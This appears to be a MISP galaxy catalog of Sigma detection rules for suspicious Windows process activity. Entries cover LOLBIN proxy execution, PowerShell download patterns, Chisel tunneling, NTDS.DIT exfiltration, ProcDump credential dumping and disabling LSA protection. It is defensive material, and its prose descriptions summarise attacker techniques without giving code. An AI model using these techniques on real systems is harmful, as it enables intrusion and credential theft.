HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications. HxTsr.exe is part of the Outlook apps and resides in a hidden "WindowsApps" subfolder of "C:\Program Files". Any instance of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe.

Internal MISP references

UUID 4e762605-34a8-406d-b72e-c1a089313320 which can be used as unique global reference for Potential Fake Instance Of Hxtsr.EXE Executed in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sreeman
creation_date 2020/04/17
falsepositive ['Unknown']
filename proc_creation_win_hxtsr_masquerading.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036']
Related clusters

To see the related clusters, click here.

Port Forwarding Activity Via SSH.EXE

Detects port forwarding activity via SSH.exe

Internal MISP references

UUID 327f48c1-a6db-4eb8-875a-f6981f1b0183 which can be used as unique global reference for Port Forwarding Activity Via SSH.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/12
falsepositive ['Administrative activity using a remote port forwarding to a local port']
filename proc_creation_win_ssh_port_forward.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.lateral_movement', 'attack.t1572', 'attack.t1021.001', 'attack.t1021.004']
Related clusters

To see the related clusters, click here.

File Encryption Using Gpg4win

Detects usage of Gpg4win to encrypt files

Internal MISP references

UUID 550bbb84-ce5d-4e61-84ad-e590f0024dcd which can be used as unique global reference for File Encryption Using Gpg4win in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/09
falsepositive ['Unknown']
filename proc_creation_win_gpg4win_encryption.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Suspicious Ping/Del Command Combination

Detects a method often used by ransomware, which combines "ping" to wait a couple of seconds and then "del" to delete the file in question. It is used, for example, to hide the file responsible for the initial infection.

Internal MISP references

UUID 54786ddc-5b8a-11ed-9b6a-0242ac120002 which can be used as unique global reference for Suspicious Ping/Del Command Combination in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ilya Krestinichev
creation_date 2022/11/03
falsepositive ['Unknown']
filename proc_creation_win_cmd_ping_del_combined_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070.004']
Related clusters

To see the related clusters, click here.

File Download with Headless Browser

Detects execution of chromium based browser in headless mode using the "dump-dom" command line to download files

Internal MISP references

UUID 0e8cfe08-02c9-4815-a2f8-0d157b7ed33e which can be used as unique global reference for File Download with Headless Browser in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sreeman, Florian Roth (Nextron Systems)
creation_date 2022/01/04
falsepositive ['Unknown']
filename proc_creation_win_browsers_chromium_headless_file_download.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Persistence Via TypedPaths - CommandLine

Detects modification of or addition to the 'TypedPaths' key in the user or admin registry via the command line, which might indicate a persistence attempt.

Internal MISP references

UUID ec88289a-7e1a-4cc3-8d18-bd1f60e4b9ba which can be used as unique global reference for Persistence Via TypedPaths - CommandLine in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/22
falsepositive ['Unknown']
filename proc_creation_win_registry_typed_paths_persistence.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.persistence']

System Disk And Volume Reconnaissance Via Wmic.EXE

An adversary might use WMI to discover information about the system, such as the volume name, size, free space, and other disk information. This can be done using the wmic command-line utility and has been observed being used by threat actors such as Volt Typhoon.

Internal MISP references

UUID c79da740-5030-45ec-a2e0-479e824a562c which can be used as unique global reference for System Disk And Volume Reconnaissance Via Wmic.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Stephen Lincoln @slincoln-aiq(AttackIQ)
creation_date 2024/02/02
falsepositive ['Unknown']
filename proc_creation_win_wmic_recon_volume.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.discovery', 'attack.t1047', 'attack.t1082']
Related clusters

To see the related clusters, click here.

Net WebClient Casing Anomalies

Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques

Internal MISP references

UUID c86133ad-4725-4bd0-8170-210788e0a7ba which can be used as unique global reference for Net WebClient Casing Anomalies in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/05/24
falsepositive ['Unknown']
filename proc_creation_win_powershell_webclient_casing.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Suspicious Chromium Browser Instance Executed With Custom Extension

Detects a suspicious process spawning a Chromium based browser process with the 'load-extension' flag to start an instance with a custom extension

Internal MISP references

UUID 27ba3207-dd30-4812-abbf-5d20c57d474e which can be used as unique global reference for Suspicious Chromium Browser Instance Executed With Custom Extension in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Aedan Russell, frack113, X__Junior (Nextron Systems)
creation_date 2022/06/19
falsepositive ['Unknown']
filename proc_creation_win_browsers_chromium_susp_load_extension.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1176']
Related clusters

To see the related clusters, click here.

Suspicious Process Start Locations

Detects suspicious processes run from unusual locations.

Internal MISP references

UUID 15b75071-74cc-47e0-b4c6-b43744a62a2b which can be used as unique global reference for Suspicious Process Start Locations in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author juju4, Jonhnathan Ribeiro, oscd.community
creation_date 2019/01/16
falsepositive ['False positives depend on scripts and administrative tools used in the monitored environment']
filename proc_creation_win_rundll32_run_locations.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036', 'car.2013-05-002']
Related clusters

To see the related clusters, click here.

PUA - Chisel Tunneling Tool Execution

Detects usage of the Chisel tunneling tool via the commandline arguments

Internal MISP references

UUID 8b0e12da-d3c3-49db-bb4f-256703f380e5 which can be used as unique global reference for PUA - Chisel Tunneling Tool Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/09/13
falsepositive ['Some false positives may occur with other tools with similar commandlines']
filename proc_creation_win_pua_chisel.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1090.001']
Related clusters

To see the related clusters, click here.

Potential DLL Sideloading Via DeviceEnroller.EXE

Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. This non-existent DLL file is named "ShellChromeAPI.dll". Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter

Internal MISP references

UUID e173ad47-4388-4012-ae62-bd13f71c18a8 which can be used as unique global reference for Potential DLL Sideloading Via DeviceEnroller.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @gott_cyber
creation_date 2022/08/29
falsepositive ['Unknown']
filename proc_creation_win_deviceenroller_dll_sideloading.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

File Download And Execution Via IEExec.EXE

Detects execution of the IEExec utility to download and execute files

Internal MISP references

UUID 9801abb8-e297-4dbf-9fbd-57dde0e830ad which can be used as unique global reference for File Download And Execution Via IEExec.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/05/16
falsepositive ['Unknown']
filename proc_creation_win_ieexec_download.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Potential Manage-bde.wsf Abuse To Proxy Execution

Detects potential abuse of the "manage-bde.wsf" script as a LOLBIN to proxy execution

Internal MISP references

UUID c363385c-f75d-4753-a108-c1a8e28bdbda which can be used as unique global reference for Potential Manage-bde.wsf Abuse To Proxy Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author oscd.community, Natalia Shornikova, Nasreddine Bencherchali (Nextron Systems)
creation_date 2020/10/13
falsepositive ['Unlikely']
filename proc_creation_win_lolbin_manage_bde.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1216']
Related clusters

To see the related clusters, click here.

ImagingDevices Unusual Parent/Child Processes

Detects unusual parent or child processes of the ImagingDevices.exe (Windows Contacts) process, as seen being used with Bumblebee activity.

Internal MISP references

UUID f11f2808-adb4-46c0-802a-8660db50fa99 which can be used as unique global reference for ImagingDevices Unusual Parent/Child Processes in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/27
falsepositive ['Unknown']
filename proc_creation_win_imagingdevices_unusual_parents.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution']

Execution of Suspicious File Type Extension

Detects whether the image specified in a process creation event doesn't refer to an ".exe" (or other known executable extension) file. This can be caused by process ghosting or other unorthodox methods to start a process. This rule might require some initial baselining to align with some third party tooling in the user environment.

Internal MISP references

UUID c09dad97-1c78-4f71-b127-7edb2b8e491a which can be used as unique global reference for Execution of Suspicious File Type Extension in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Max Altgelt (Nextron Systems)
creation_date 2021/12/09
falsepositive ['Unknown']
filename proc_creation_win_susp_non_exe_image.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Potential Suspicious Mofcomp Execution

Detects execution of the "mofcomp" utility as a child of a suspicious shell or script running utility or by having a suspicious path in the commandline. The "mofcomp" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository. Attackers abuse this utility to install malicious MOF scripts

Internal MISP references

UUID 1dd05363-104e-4b4a-b963-196a534b03a1 which can be used as unique global reference for Potential Suspicious Mofcomp Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/12
falsepositive ['Unknown']
filename proc_creation_win_mofcomp_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']

CodePage Modification Via MODE.COM To Russian Language

Detects a CodePage modification using the "mode.com" utility to Russian language. This behavior has been used by threat actors behind Dharma ransomware.

Internal MISP references

UUID 12fbff88-16b5-4b42-9754-cd001a789fb3 which can be used as unique global reference for CodePage Modification Via MODE.COM To Russian Language in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseliyo Sanchez, @Joseliyo_Jstnk
creation_date 2024/01/17
falsepositive ['Russian speaking people changing the CodePage']
filename proc_creation_win_mode_codepage_russian.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036']

Malicious Windows Script Components File Execution by TAEF Detection

The Windows Test Authoring and Execution Framework (TAEF) allows you to run automation by executing test files written in different languages (C, C#, Microsoft COM Scripting interfaces). Adversaries may execute malicious code (such as a WSC file with VBScript, a DLL and so on) directly by running te.exe.

Internal MISP references

UUID 634b00d5-ccc3-4a06-ae3b-0ec8444dd51b which can be used as unique global reference for Malicious Windows Script Components File Execution by TAEF Detection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Agro (@agro_sev) oscd.community
creation_date 2020/10/13
falsepositive ["It's not an uncommon to use te.exe directly to execute legal TAEF tests"]
filename proc_creation_win_susp_use_of_te_bin.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']

Suspicious PowerShell Encoded Command Patterns

Detects PowerShell command line patterns in combination with encoded commands that often appear in malware infection chains.

Internal MISP references

UUID b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c which can be used as unique global reference for Suspicious PowerShell Encoded Command Patterns in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/05/24
falsepositive ['Other tools that work with encoded scripts in the command line instead of script files']
filename proc_creation_win_powershell_base64_encoded_cmd_patterns.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']

7Zip Compressing Dump Files

Detects execution of 7z in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration.

Internal MISP references

UUID ec570e53-4c76-45a9-804d-dc3f355ff7a7 which can be used as unique global reference for 7Zip Compressing Dump Files in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/27
falsepositive ['Legitimate use of 7z with a command line in which ".dmp" or ".dump" appears accidentally', 'Legitimate use of 7z to compress WER ".dmp" files for troubleshooting']
filename proc_creation_win_7zip_exfil_dmp_files.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.t1560.001']

Change Default File Association To Executable Via Assoc

Detects when a program changes the default file association of any extension to an executable. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.

Internal MISP references

UUID ae6f14e6-14de-45b0-9f44-c0986f50dc89 which can be used as unique global reference for Change Default File Association To Executable Via Assoc in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/28
falsepositive ['Unknown']
filename proc_creation_win_cmd_assoc_tamper_exe_file_association.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1546.001']

Mstsc.EXE Execution From Uncommon Parent

Detects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations.

Internal MISP references

UUID ff3b6b39-e765-42f9-bb2c-ea6761e0e0f6 which can be used as unique global reference for Mstsc.EXE Execution From Uncommon Parent in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/04/18
falsepositive ['Unlikely']
filename proc_creation_win_mstsc_run_local_rpd_file_susp_parent.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.lateral_movement']

Regsvr32 Execution From Potential Suspicious Location

Detects execution of regsvr32 where the DLL is located in a potentially suspicious location.

Internal MISP references

UUID 9525dc73-0327-438c-8c04-13c0e037e9da which can be used as unique global reference for Regsvr32 Execution From Potential Suspicious Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/26
falsepositive ['Some installers might execute "regsvr32" with DLLs located in %TEMP% or in %PROGRAMDATA%. Apply additional filters if necessary.']
filename proc_creation_win_regsvr32_susp_exec_path_1.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.010']

Suspicious Execution Location Of Wermgr.EXE

Detects suspicious Windows Error Reporting manager (wermgr.exe) execution location.

Internal MISP references

UUID 5394fcc7-aeb2-43b5-9a09-cac9fc5edcd5 which can be used as unique global reference for Suspicious Execution Location Of Wermgr.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/10/14
falsepositive ['Unknown']
filename proc_creation_win_wermgr_susp_exec_location.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Potential SysInternals ProcDump Evasion

Detects uses of the SysInternals ProcDump utility in which ProcDump or its output gets renamed, or a dump file is moved or copied to a different name.

Internal MISP references

UUID 79b06761-465f-4f88-9ef2-150e24d3d737 which can be used as unique global reference for Potential SysInternals ProcDump Evasion in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/01/11
falsepositive ['False positives are expected in cases in which ProcDump just gets copied to a different directory without any renaming']
filename proc_creation_win_sysinternals_procdump_evasion.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036', 'attack.t1003.001']

Run PowerShell Script from ADS

Detects PowerShell script execution from Alternate Data Stream (ADS)

Internal MISP references

UUID 45a594aa-1fbd-4972-a809-ff5a99dd81b8 which can be used as unique global reference for Run PowerShell Script from ADS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sergey Soldatov, Kaspersky Lab, oscd.community
creation_date 2019/10/30
falsepositive ['Unknown']
filename proc_creation_win_powershell_run_script_from_ads.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564.004']

Active Directory Structure Export Via Csvde.EXE

Detects the execution of "csvde.exe" in order to export organizational Active Directory structure.

Internal MISP references

UUID e5d36acd-acb4-4c6f-a13f-9eb203d50099 which can be used as unique global reference for Active Directory Structure Export Via Csvde.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/03/14
falsepositive ['Unknown']
filename proc_creation_win_csvde_export.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.exfiltration', 'attack.discovery', 'attack.t1087.002']

Monitoring For Persistence Via BITS

BITS allows you to schedule a command to execute after a successful download, to notify you that the job is finished. When the job runs on the system, the command specified in the BITS job is executed. This can be abused by actors to create a backdoor on the system and for persistence: the download of malware or additional binaries is chained in a BITS job, and the program is executed after being downloaded.

Internal MISP references

UUID b9cbbc17-d00d-4e3d-a827-b06d03d2380d which can be used as unique global reference for Monitoring For Persistence Via BITS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sreeman
creation_date 2020/10/29
falsepositive ['Unknown']
filename proc_creation_win_bitsadmin_potential_persistence.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1197']

Explorer Process Tree Break

Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries. This is similar to cmd.exe /c, except that it breaks the process tree and makes the parent a new instance of explorer spawned from "svchost".

Internal MISP references

UUID 949f1ffb-6e85-4f00-ae1e-c3c5b190d605 which can be used as unique global reference for Explorer Process Tree Break in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @gott_cyber
creation_date 2019/06/29
falsepositive ['Unknown']
filename proc_creation_win_explorer_break_process_tree.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036']

Proxy Execution Via Explorer.exe

Attackers can use explorer.exe for evading defense mechanisms

Internal MISP references

UUID 9eb271b9-24ae-4cd4-9465-19cfc1047f3e which can be used as unique global reference for Proxy Execution Via Explorer.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative
creation_date 2020/10/05
falsepositive ['Legitimate explorer.exe run from cmd.exe']
filename proc_creation_win_explorer_lolbin_execution.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']

Netsh Allow Group Policy on Microsoft Defender Firewall

Adversaries may modify system firewalls in order to bypass controls limiting network usage

Internal MISP references

UUID 347906f3-e207-4d18-ae5b-a9403d6bcdef which can be used as unique global reference for Netsh Allow Group Policy on Microsoft Defender Firewall in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/09
falsepositive ['Legitimate administration activity']
filename proc_creation_win_netsh_fw_enable_group_rule.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.004']

Renamed Gpg.EXE Execution

Detects the execution of a renamed "gpg.exe". Often used by ransomware and loaders to decrypt/encrypt data.

Internal MISP references

UUID ec0722a3-eb5c-4a56-8ab2-bf6f20708592 which can be used as unique global reference for Renamed Gpg.EXE Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), frack113
creation_date 2023/08/09
falsepositive No established falsepositives
filename proc_creation_win_renamed_gpg4win.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.impact', 'attack.t1486']

File And SubFolder Enumeration Via Dir Command

Detects usage of the "dir" command, part of Windows CMD, with the "/S" command line flag in order to enumerate files in a specified directory and all subdirectories.

Internal MISP references

UUID 7c9340a9-e2ee-4e43-94c5-c54ebbea1006 which can be used as unique global reference for File And SubFolder Enumeration Via Dir Command in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/13
falsepositive ['Likely']
filename proc_creation_win_cmd_dir_execution.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1217']

Pubprn.vbs Proxy Execution

Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands.

Internal MISP references

UUID 1fb76ab8-fa60-4b01-bddd-71e89bf555da which can be used as unique global reference for Pubprn.vbs Proxy Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/05/28
falsepositive ['Unknown']
filename proc_creation_win_lolbin_pubprn.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1216.001']

Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell

Detects PowerShell as a child of the WmiPrvSE process, which could be a sign of lateral movement via WMI.

Internal MISP references

UUID 692f0bec-83ba-4d04-af7e-e884a96059b6 which can be used as unique global reference for Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis @Karneades
creation_date 2019/04/03
falsepositive ['AppvClient', 'CCM', 'WinRM']
filename proc_creation_win_wmiprvse_spawns_powershell.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1047', 'attack.t1059.001']

Abusing Print Executable

Attackers can use print.exe for remote file copy

Internal MISP references

UUID bafac3d6-7de9-4dd9-8874-4a1194b493ed which can be used as unique global reference for Abusing Print Executable in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative
creation_date 2020/10/05
falsepositive ['Unknown']
filename proc_creation_win_print_remote_file_copy.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']

Suspicious WindowsTerminal Child Processes

Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section)

Internal MISP references

UUID 8de89e52-f6e1-4b5b-afd1-41ecfa300d48 which can be used as unique global reference for Suspicious WindowsTerminal Child Processes in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/25
falsepositive ['Other legitimate "Windows Terminal" profiles']
filename proc_creation_win_windows_terminal_susp_children.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.persistence']

HackTool - Bloodhound/Sharphound Execution

Detects command line parameters used by Bloodhound and Sharphound hack tools

Internal MISP references

UUID f376c8a7-a2d0-4ddc-aa0c-16c17236d962 which can be used as unique global reference for HackTool - Bloodhound/Sharphound Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/12/20
falsepositive ["Other programs that use these command line option and accepts an 'All' parameter"]
filename proc_creation_win_hktl_bloodhound_sharphound.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1087.001', 'attack.t1087.002', 'attack.t1482', 'attack.t1069.001', 'attack.t1069.002', 'attack.execution', 'attack.t1059.001']

Uncommon Extension Shim Database Installation Via Sdbinst.EXE

Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe. Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims

Internal MISP references

UUID 18ee686c-38a3-4f65-9f44-48a077141f42 which can be used as unique global reference for Uncommon Extension Shim Database Installation Via Sdbinst.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/01
falsepositive ['Unknown']
filename proc_creation_win_sdbinst_susp_extension.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1546.011']

Lolbin Unregmp2.exe Use As Proxy

Detects usage of the "unregmp2.exe" binary as a proxy to launch a custom version of "wmpnscfg.exe".

Internal MISP references

UUID 727454c0-d851-48b0-8b89-385611ab0704 which can be used as unique global reference for Lolbin Unregmp2.exe Use As Proxy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/12/29
falsepositive ['Unknown']
filename proc_creation_win_lolbin_unregmp2.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']

Suspicious Process Patterns NTDS.DIT Exfil

Detects suspicious process patterns used in NTDS.DIT exfiltration

Internal MISP references

UUID 8bc64091-6875-4881-aaf9-7bd25b5dda08 which can be used as unique global reference for Suspicious Process Patterns NTDS.DIT Exfil in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/03/11
falsepositive ['Unknown']
filename proc_creation_win_susp_ntds.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.003']

Procdump Execution

Detects usage of the SysInternals Procdump utility

Internal MISP references

UUID 2e65275c-8288-4ab4-aeb7-6274f58b6b20 which can be used as unique global reference for Procdump Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/08/16
falsepositive ['Legitimate use of procdump by a developer or administrator']
filename proc_creation_win_sysinternals_procdump.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036', 'attack.t1003.001']

LSA PPL Protection Disabled Via Reg.EXE

Detects the usage of the "reg.exe" utility to disable PPL protection on the LSA process

Internal MISP references

UUID 8c0eca51-0f88-4db2-9183-fdfb10c703f9 which can be used as unique global reference for LSA PPL Protection Disabled Via Reg.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/03/22
falsepositive ['Unlikely']
filename proc_creation_win_reg_lsa_ppl_protection_disabled.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.010']

PowerShell Download Pattern

Detects a Powershell process that contains download commands in its command line string

Internal MISP references

UUID 3b6ab547-8ec2-4991-b9d2-2b06702a48d7 which can be used as unique global reference for PowerShell Download Pattern in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro
creation_date 2019/01/16
falsepositive ['Unknown']
filename proc_creation_win_powershell_download_patterns.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']

Arbitrary File Download Via MSOHTMED.EXE

Detects usage of "MSOHTMED" to download arbitrary files

Internal MISP references

UUID 459f2f98-397b-4a4a-9f47-6a5ec2f1c69d which can be used as unique global reference for Arbitrary File Download Via MSOHTMED.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/19
falsepositive ['Unknown']
filename proc_creation_win_msohtmed_download.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1218']

IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols Via CLI

Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.

Internal MISP references

UUID 10344bb3-7f65-46c2-b915-2d00d47be5b0 which can be used as unique global reference for IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols Via CLI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/09/05
falsepositive ['Unknown']
filename proc_creation_win_registry_ie_security_zone_protocol_defaults_downgrade.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion']

Potential WinAPI Calls Via CommandLine

Detects the use of WinAPI functions via the command line, as seen used by threat actors via the tool winapiexec.

Internal MISP references

UUID ba3f5c1b-6272-4119-9dbd-0bc8d21c2702 which can be used as unique global reference for Potential WinAPI Calls Via CommandLine in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/06
falsepositive ['Unknown']
filename proc_creation_win_susp_inline_win_api_access.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1106']

Potential Privilege Escalation Using Symlink Between Osk and Cmd

Detects the creation of a symbolic link between "cmd.exe" and the accessibility on-screen keyboard binary (osk.exe) using "mklink". This technique provides an elevated command prompt to the user from the login screen without the need to log in.

Internal MISP references

UUID e9b61244-893f-427c-b287-3e708f321c6b which can be used as unique global reference for Potential Privilege Escalation Using Symlink Between Osk and Cmd in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/12/11
falsepositive ['Unknown']
filename proc_creation_win_cmd_mklink_osk_cmd.yml
level high
logsource.category process_creation
logsource.product windows
